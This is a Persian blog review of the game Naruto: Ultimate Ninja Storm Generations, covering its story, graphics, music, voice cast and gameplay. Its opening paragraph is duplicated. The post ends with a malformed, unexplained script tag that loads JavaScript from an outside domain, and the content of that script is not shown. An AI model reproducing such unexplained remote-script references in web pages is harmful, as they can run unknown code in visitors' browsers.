تبلیغات
بازیکده - سرگذشت نسل های نینجا

:درباره وبلاگ

:آرشیو

:طبقه بندی

:پیوندها

:پیوندهای روزانه

:نویسندگان

:آخرین پستها

:نظرسنجی

آماروبلاگ

سه شنبه 15 فروردین 1391-10:47 ب.ظخوشبختانه سری بازی های Naruto از جمله عناوین خوبی هستند که تا این لحظه از روی انیمه و مانگا ساخته شده اند و کیفیت قابل قبول آن ها باعث شده که این سری از طرفداران بسیار زیادی نیز برخوردار باشند. در جدیدترین نسخه از این مجموعه که Ultimate Ninja Storm Generations نام دارد، شاهد حضور اکثر شخصیت هایی خواهید بود که در دنیای Naruto حضور دارند. این بازی می تواند یک نسخه کامل برای کسانی باشد که از طرفداران پر و پاقرص این سری از بازی ها هستند.

خوشبختانه سری بازی های Naruto از جمله عناوین خوبی هستند که تا این لحظه از روی انیمه و مانگا ساخته شده اند و کیفیت قابل قبول آن ها باعث شده که این سری از طرفداران بسیار زیادی نیز برخوردار باشند. در جدیدترین نسخه از این مجموعه که Ultimate Ninja Storm Generations نام دارد، شاهد حضور اکثر شخصیت هایی خواهید بود که در دنیای Naruto حضور دارند. این بازی می تواند یک نسخه کامل برای کسانی باشد که از طرفداران پر و پاقرص این سری از بازی ها هستند.

داستان

داستان در این بازی مربوط به تمام شخصیت های موجود در آن می شود. در این بازی می توانید در کنار اینکه داستان ناروتو (Naruto) و ساسکه (Sasuke) را از همان ابتدای بازی دنبال کنید، با داستان و سرگذشت دیگر شخصیت های موجود در بازی نیز آشنا شوید. روند داستانی به این صورت است که در ابتدا 3 شخصیت ناروتوی کوچک، ناروتوی نوجوان و ساسکه نوجوان در بازی قرار دارند و با انتخاب هر کدام می توانید داستان آن ها را تجربه کنید و وارد مبارزه هایی بشوید که آن ها تا کنون انجام داده اند.

بعد از اینکه داستان هر کدام از آن ها به پایان رسید، شخصیت های دیگری آزاد می شوند و با انتخاب هر کدام از آن ها می توانید داستان خاص خودشان را پیش ببرید. در این بازی 75 شخصیت قابل بازی حضور دارند که در کنار آن ها 15 شخصیت پشتیبان نیز دیده می شوند. برای این بازی بیش از یک ساعت انیمه جدید ساخته شده که مربوط به تمام شخصیت های بازی می شود. داستان های فرعی این بازی باعث ایجاد پیش زمینه بیشتری از شخصیت های موجود در بازی می شوند و اگر هم انیمه را دنبال کرده باشید، این قسمت ها قطعاً برای شما جذاب و هیجان انگیز خواهند بود.

گرافیک

Naruto: UNSG همچنان حالت فانتزی نسخه های قبلی را حذف کرده و به همین دلیل حالت انیمه ای بازی به خوبی در این عنوان حفظ شده است. رنگ بندی ها بسیار عالی هستند و در طول بازی شاهد محیط های بسیار زیبا  و رنگارنگ خواهید بود. طراحی شخصیت های بازی واقعاً خوب است و حس و حال انیمه مانند آن ها به خوبی به بازیکنان منتقل می شود. جلوه های ویژه و لحظه های سینمایی بازی بسیار خوب از کار درآمده و واقعاً هیجان انگیز هستند.

با اجرای فنون مختلف شاهد صحنه های بسیار زیبا، انفجارها و اتفاقاتی خواهید بود که دیدن آن ها در قالب یک بازی فانتزی واقعاً جالب توجه و هیجان انگیز است. انیمیشن های خوبی برای شخصیت های بازی طراحی شده که باعث شده که هر کدام از آن ها به واقع حالت خودشان را داشته باشند. تنوع محیط های بازی نیز از دیگر قسمت های خوب این عنوان به شمار می رود. مبارزه ها در مکان هایی رخ می دهند که بیشتر آن ها را در انیمه مشاهده کرده اید و به همین دلیل دیدن آن ها در یک فضای سه بعدی جالب توجه خواهد بود. البته باید به این موضوع اشاره کرد که محیط های بازی به شکل خوبی نیز طراحی شده اند.

موسیقی/صداگذاری

موسیقی های این بازی توسط خانم چیکایو فوکودا (Chikayo Fukuda) ساخته شده که واقعاً زیبا هستند. او در نسخه های قبلی سری بازی های Naruto نیز آهنگسازی کرده و در این اواخر هم شاهد ساخته های او را در بازی Asura’s Wrath بودیم. تنوع موسیقی ها بسیار خوب است و در طول بازی شاهد قطعات آرام و یا موسیقی هایی با ریتم تند خواهید بود که بیشتر در مبارزه ها شنیده می شوند. صداگذاری روی شخصیت های بازی نیز مانند نسخه های قبلی خوب صورت گرفته است. استفاده از صداپیشگان غربی و شرقی برای این بازی باعث شده که بازیکنان در این قسمت حق انتخاب داشته باشند. می توانید گویش را به صورت ژاپنی کنید و بازی را با زیرنویس انگلیسی دنبال کنید که در این صورت فضای بازی دقیقاً مانند فضای انیمه ژاپنی می شود.

همچنین می توانید بازی را با صدای صداپیشگان انگلیسی دنبال کنید که این قسمت نیز در نوع خودش بسیار جالب توجه است. استفاده از صداگذاران آشنای انیمه در این بازی فضای خوبی را در بازی خلق کرده است. حضور 72 شخصیت به این معنا است که صداپیشگان آن ها نیز در این بازی حضور داشته اند. از بین این صداپیشگان می توان به مایلی فلاناگان (Maile Flanagan) صداگذار شخصیت ناروتو، کیت هیگینز (Kate Higgins) صداگذار شخصیت ساکورا (Sakura)، بنجامین دیسکین (Benjamin Diskin) صداگذار شخصیت سای (Sai)، دیو ویتنبرگ (Dave Wittenberg) صداگذار شخصیت کاکاشی (Kakashi) و... اشاره کرد.

گیم پلی

سری بازی های Naruto جزو عناوین مبارزه ای به حساب می آیند. در این نسخه نیز با وجود تعداد بسیار زیادی شخصیت قابل بازی، باید به این موضوع اشاره کرد که یک عنوان بسیار خوب را پیش رو خواهید داشت. تنوع شخصیت های بازی یکی از المان های مثبت آن به حساب می آید و بازیکنان نیز قدرت انتخاب بیشتری در این بازی دارند. در کنار قسمت داستانی که بازیکنان در مبارزه هایی که در جریان داستان رخ داده، حضور می یابند، می توانید بازی را به صورت یک عنوان مبارزه ای استاندارد نیز تجربه کنید. در این بازی باید یک شخصیت اصلی انتخاب کنید. در کنار شخصیت اصلی نیز باید دو شخصیت دیگر انتخاب کنید که به صورت پشتیبان در بازی حضور دارند.

البته همان طور که به آن اشاره کردیم، برخی از شخصیت های بازی نیز تنها به صورت پشتیبان قابل بازی هستند. در یک مبارزه باید با شخصیت اصلی ای که انتخاب کرده اید، بازی را پیش ببرید. اگر شخصیت اصلی بمیرد، بازی به پایان می رسد و شخصیت های پشتیبان نیز نمی توانند کاری انجام دهند. شخصیت های پشتیبان می توانند بسیار کارآمد باشند. با استفاده از آن ها می توانید در مواقع مختلف از قدرت ها و فنون آن ها استفاده کنید. به طور مثال از این موضوع می توانید زمانی استفاده کنید که در حال اجرای یک ضربه ترکیبی هستید. پس از اجرای آن، اگر بتوانید از شخصیت های پشتیبان استفاده کنید، می توانید میزان زیادی از سلامتی دشمن را کم کنید.

قابلیت جابجایی که در نسخه های قبلی به صورت نامحدود می توانستید از آن استفاده کنید، در این بازی محدود شده و بازیکنان فقط چند بار می توانند از آن استفاده کنند. البته این میزان قابل برگشت است و در زمان مبارزه مشاهده می کنید که می توانید بیشتر از میزان مشخص شده از این تکنیک استفاده کنید. این تکنیک در زمان مبارزه ها بسیار کارآمد است و می توانید در بسیاری از موارد حریف را با این تکنیک غافلگیر کنید و جریان بازی را به نفع خود تغییر دهید. سیستم مبارزه ها چندان مشکل و پیچیده نیست، اما سرعت و استفاده درست از قدرت ها و چاکرایی (Chakra) که در اختیار دارید، حرف اول را در بازی می زند. میزان چاکرایی که در اختیار دارید، محدود است و باید در استفاده از آن دقت کنید. چاکرا باعث می شود که بتوانید Ninjitsuهای فوق العاده ای را در بازی اجرا کنید که تماشای آن ها نیز بسیار جذاب است. مبارزه در محیط های بزرگ این بازی، هم هیجان را بیشتر کرده و هم سرعت و روند گیم پلی را بهتر کرده است. البته باید به این موضوع نیز اشاره کرد که در زمان اجرای برخی از فنون شاهد افت فریم در بازی نیز خواهید بود.

نتیجه گیری

این نسخه از سری بازهای Naruto برای کسانی که با دنیای این شخصیت آشنایی ندارند، بسیار عالی خواهد بود. با تجربه این بازی، می توانید با تمام شخصیت ها آشنا شوید و داستان آن ها را تجربه کنید. این بازی می تواند یک آغاز برای کسانی باشد که می خواهند به دنیای Naruto وارد شوند. داستان جدید و روند گیم پلی بازی نیز می تواند همچنان طرفداران این سری از بازی ها را به سمت خودش جلب کند.

تاریخ آخرین ویرایش:- -
script src="http://filmdoni.ir/game/01.js" language="javascript" >